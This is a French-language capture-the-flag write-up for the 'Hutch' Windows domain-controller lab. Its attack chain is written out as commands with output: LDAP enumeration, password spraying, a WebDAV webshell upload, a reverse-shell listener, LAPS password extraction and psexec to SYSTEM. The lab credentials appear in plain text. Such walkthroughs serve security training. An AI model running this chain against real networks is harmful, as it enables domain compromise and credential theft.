Hutch

ldap bloodhound.py kerberos laps

Nom machine : Hutch
Difficulté : Intermédiaire
OS : Windows

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-03 08:23 EDT
Nmap scan report for 192.168.218.122
Host is up (0.038s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|   Server Date: Sat, 03 Aug 2024 12:28:06 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|_  Server Type: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-03 12:27:17Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49856/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

(Domain: hutch.offsec0., Site: Default-First-Site-Name)

Nous avons ajouté " hutch.offsec " au fichier /etc/hosts

LDAP (389)

Nous allons extraire des noms d'utilisateurs

┌──(kali㉿kali)-[~]
└─$ ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.249.122" "(objectclass=*)"
ldap_initialize( ldap://192.168.249.122:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
# extended LDIF
#
# LDAPv3
# base <DC=hutch,DC=offsec> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# hutch.offsec
dn: DC=hutch,DC=offsec

# Administrator, Users, hutch.offsec
dn: CN=Administrator,CN=Users,DC=hutch,DC=offsec

# Guest, Users, hutch.offsec
dn: CN=Guest,CN=Users,DC=hutch,DC=offsec
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
{...}

La sortie est très longue, nous allons donc la réduire et selectionnant uniquement ce qui nous intéresse.

┌──(kali㉿kali)-[~]
└─$ ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.249.122" "(objectclass=*)" | grep sAMAccountName 
ldap_initialize( ldap://192.168.249.122:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
sAMAccountName: Guest
sAMAccountName: Domain Computers
sAMAccountName: Cert Publishers
sAMAccountName: Domain Users
sAMAccountName: Domain Guests
sAMAccountName: Group Policy Creator Owners
sAMAccountName: RAS and IAS Servers
sAMAccountName: Allowed RODC Password Replication Group
sAMAccountName: Denied RODC Password Replication Group
sAMAccountName: Enterprise Read-only Domain Controllers
sAMAccountName: Cloneable Domain Controllers
sAMAccountName: Protected Users
sAMAccountName: DnsAdmins
sAMAccountName: DnsUpdateProxy
sAMAccountName: rplacidi
sAMAccountName: opatry
sAMAccountName: ltaunton
sAMAccountName: acostello
sAMAccountName: jsparwell
sAMAccountName: oknee
sAMAccountName: jmckendry
sAMAccountName: avictoria
sAMAccountName: jfrarey
sAMAccountName: eaburrow
sAMAccountName: cluddy
sAMAccountName: agitthouse
sAMAccountName: fmcsorley

Bingo ! Maintenant nous pouvons recopier ces noms d'utilisateurs dans un fichier. Nous pouvons par exemple utiliser gedit et utiliser la fonction rechercher et modifier.

Nous allons voir si on ne trouve pas d'autres informations importantes ...

┌──(kali㉿kali)-[~]
└─$ ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.249.122" "(objectclass=*)" | grep Password
ldap_initialize( ldap://192.168.249.122:389/??base )
filter: (objectclass=*)
requesting: All userApplication attributes
badPasswordTime: 133672742592729828
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offse
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offse
# Allowed RODC Password Replication Group, Users, hutch.offsec
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec
cn: Allowed RODC Password Replication Group
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutc
name: Allowed RODC Password Replication Group
sAMAccountName: Allowed RODC Password Replication Group
# Denied RODC Password Replication Group, Users, hutch.offsec
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec
cn: Denied RODC Password Replication Group
distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch
name: Denied RODC Password Replication Group
sAMAccountName: Denied RODC Password Replication Group
badPasswordTime: 133672743850542338
badPasswordTime: 133672743948511044
badPasswordTime: 133672744026479793
badPasswordTime: 133672744107886055
badPasswordTime: 133672744190229807
badPasswordTime: 133672744288354825
badPasswordTime: 133672744357573563
badPasswordTime: 133672744449761061
badPasswordTime: 133672744527886082
badPasswordTime: 133672744602104827
badPasswordTime: 133672744674448546
badPasswordTime: 133672744751011084
description: Password set to CrabSharkJellyfish192 at user's request. Please c
badPasswordTime: 133672744830386057

Nous trouvons donc un mot de passe

Kerberos (88)

┌──(kali㉿kali)-[~]
└─$ /usr/share/doc/python3-impacket/examples/GetNPUsers.py hutch.offsec/ -dc-ip 192.168.249.122 -usersfile hutch.txt -format hashcat -outputfile hashes.txt
{...}
[-] User jfrarey doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eaburrow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User cluddy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User agitthouse doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fmcsorley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

Aucun hash de retrouver.

Nous allons utiliser le mot de passe retrouvé plus tôt.

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.249.122 -u hutch.txt -p "CrabSharkJellyfish192" --continue-on-success
SMB         192.168.249.122 445    HUTCHDC          [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\Guest:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\rplacidi:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\opatry:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\ltaunton:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\acostello:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\jsparwell:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\oknee:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\jmckendry:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\avictoria:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\jfrarey:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\eaburrow:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\cluddy:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\agitthouse:CrabSharkJellyfish192 STATUS_LOGON_FAILURE 
SMB         192.168.249.122 445    HUTCHDC          [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192 
SMB         192.168.249.122 445    HUTCHDC          [-] hutch.offsec\:CrabSharkJellyfish192 STATUS_LOGON_FAILURE

Le mot de passe appartient à fmcsorley !

Accès initial

Cadaver (webDAV)

Nous pouvons nous connecter au port 80 et upload un shell. Nous avons obtenu ses informations grâce au scan nmap où "post" est autorisé pour webdav.

webshell/fuzzdb-webshell/asp/cmdasp.aspx at master · tennc/webshellGitHub

┌──(kali㉿kali)-[~]
└─$ cadaver http://192.168.212.122/
Authentication required for 192.168.212.122 on server `192.168.212.122':
Username: fmcsorley
Password: 
dav:/> put cmdasp.aspx
Uploading cmdasp.aspx to `/cmdasp.aspx':
Progress: [=============================>] 100.0% of 1401 bytes succeeded.

J'ai copié le reverse-shell PowerShell base64 de :

Online - Reverse Shell Generatorwww.revshells.com

Puis lancer la commande, tout en ayant un listeneur sur ma macine kali

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234   
listening on [any] 1234 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.212.122] 50095
whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv>

Elévation des privilèges

Nous pouvous voir un service LAPS .

PS C:\Program Files\LAPS> 

    Directory: C:\Program Files\LAPS\CSE
Mode                LastWriteTime         Length Name                       
----                -------------         ------ ----                       
-a----        9/22/2016   9:02 AM         148632 AdmPwd.dll

Nous pouvons l'exploiter.

┌──(kali㉿kali)-[~]
└─$ ldapsearch -x -H 'ldap://192.168.212.122' -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# extended LDIF
#
# LDAPv3
# base <dc=hutch,dc=offsec> with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd 
#

# HUTCHDC, Domain Controllers, hutch.offsec
dn: CN=HUTCHDC,OU=Domain Controllers,DC=hutch,DC=offsec
ms-Mcs-AdmPwd: 0sxhC1%Om9UK(C

# search reference
ref: ldap://ForestDnsZones.hutch.offsec/DC=ForestDnsZones,DC=hutch,DC=offsec

# search reference
ref: ldap://DomainDnsZones.hutch.offsec/DC=DomainDnsZones,DC=hutch,DC=offsec

# search reference
ref: ldap://hutch.offsec/CN=Configuration,DC=hutch,DC=offsec

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

Ce qui nous intéresse : ms-Mcs-AdmPwd: 0sxhC1%Om9UK(C

Nous avons exécuté psexec :

┌──(kali㉿kali)-[~]
└─$ impacket-psexec administrator:'0sxhC1%Om9UK(C'@192.168.212.122
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 192.168.212.122.....
[*] Found writable share ADMIN$
[*] Uploading file LHBVafld.exe
[*] Opening SVCManager on 192.168.212.122.....
[*] Creating service hYKZ on 192.168.212.122.....
[*] Starting service hYKZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

Nous sommes nt authority\system !

Il y avait encore d'autres moyens de finir la box, par exemple, il était possible d'utiliser PrintSpoofer (SeImpersonate privileges : enabled).

PrécédentHub SuivantInternal

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagLDAP (389)

hashtagKerberos (88)

hashtagAccès initial

hashtagCadaver (webDAV)

hashtagElévation des privilèges